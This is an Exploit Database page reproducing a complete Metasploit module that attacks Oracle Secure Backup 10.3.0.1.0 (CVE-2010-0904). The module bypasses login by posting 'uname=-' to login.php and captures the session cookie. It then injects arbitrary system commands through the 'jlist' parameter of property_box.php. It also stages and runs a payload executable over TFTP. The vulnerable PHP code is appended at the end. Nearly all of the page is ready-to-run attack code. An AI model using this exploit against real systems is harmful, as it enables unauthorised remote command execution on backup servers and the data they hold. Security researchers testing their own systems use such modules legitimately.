Oracle Secure Backup – Authentication Bypass/Command Injection (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Metasploit
  日期： 2011-08-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17698/

• ##
  # $Id: osb_uname_jlist.rb 13591 2011-08-19 18:35:29Z mc $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = GreatRanking
  
  	include Msf::Exploit::CmdStagerTFTP
  	include Msf::Exploit::Remote::HttpClient
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
  			'Description'=> %q{
  					This module exploits an authentication bypass vulnerability
  				in login.php. In conjuction with the authentication bypass issue,
  				the 'jlist' parameter in property_box.php can be used to execute
  				arbitrary system commands.
  				This module was tested against Oracle Secure Backup version 10.3.0.1.0
  			},
  			'Author' => [ 'MC' ],
  			'License'=> MSF_LICENSE,
  			'Version'=> '$Revision: 13591 $',
  			'References' =>
  				[
  					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],
  					[ 'CVE', '2010-0904' ],
  					# the jlist vector has not been disclosed or has it?
  				],
  			'Targets'	=>
  				[
  					[ 'Windows Universal', 
  						{ 
  							'Arch' => ARCH_X86,
  							'Platform' => 'win'
  						} 
  					]
  				],
  			'Privileged' => 'true',
  			'Platform' => 'win',
  			'DisclosureDate' => 'Jul 13 2010',
  			'DefaultTarget' => 0))
  
  		register_options(
  			[
  				Opt::RPORT(443),
  				OptBool.new('SSL', [true, 'Use SSL', true]),
  				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
  			], self.class)
  	end
  
  	def windows_stager
  
  		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
  		
  		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
  		execute_cmdstager({ :temp => '.'})
  		@payload_exe = payload_exe
  		
  		print_status("Attempting to execute the payload...")
  		execute_command(@payload_exe)
  	
  	end
  
  	def execute_command(cmd, opts = {})
  
  		res = send_request_cgi(
  			{
  				'uri' =>'/login.php',
  				'data'=>'attempt=1&uname=-',
  				'method' => 'POST',
  			}, 5)
  
  		if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
  			sessionid = res.headers['Set-Cookie'].split(';')[0]
  
  			data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
  		
  			send_request_raw(
  				{
  					'uri' => '/property_box.php' + data,
  					'cookie' => sessionid,
  					'method' => 'GET',
  				}, 5)
  
  		else
  			print_error("Invalid PHPSESSION token..")
  			return
  		end
  	end
  
  	def exploit
  
  		if not datastore['CMD'].empty?
  			print_status("Executing command '#{datastore['CMD']}'")
  			execute_command(datastore['CMD'])
  			return
  		end
  
  		case target['Platform']
  			when 'win'
  				windows_stager
  			else
  				raise RuntimeError, 'Target not supported.'
  		end
  
  		handler
  	
  	end
  end
  __END__
  else if (strcmp($type, "Job") == 0)
  {
  if (!is_array($objectname))
  $objectname = array();
  reset($objectname);
  while (list(,$oname) = each($objectname))
  {
  $oname = escapeshellarg($oname);
  $jlist = "$jlist $oname";
  }
  if (strlen($jlist) > 0)
  $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");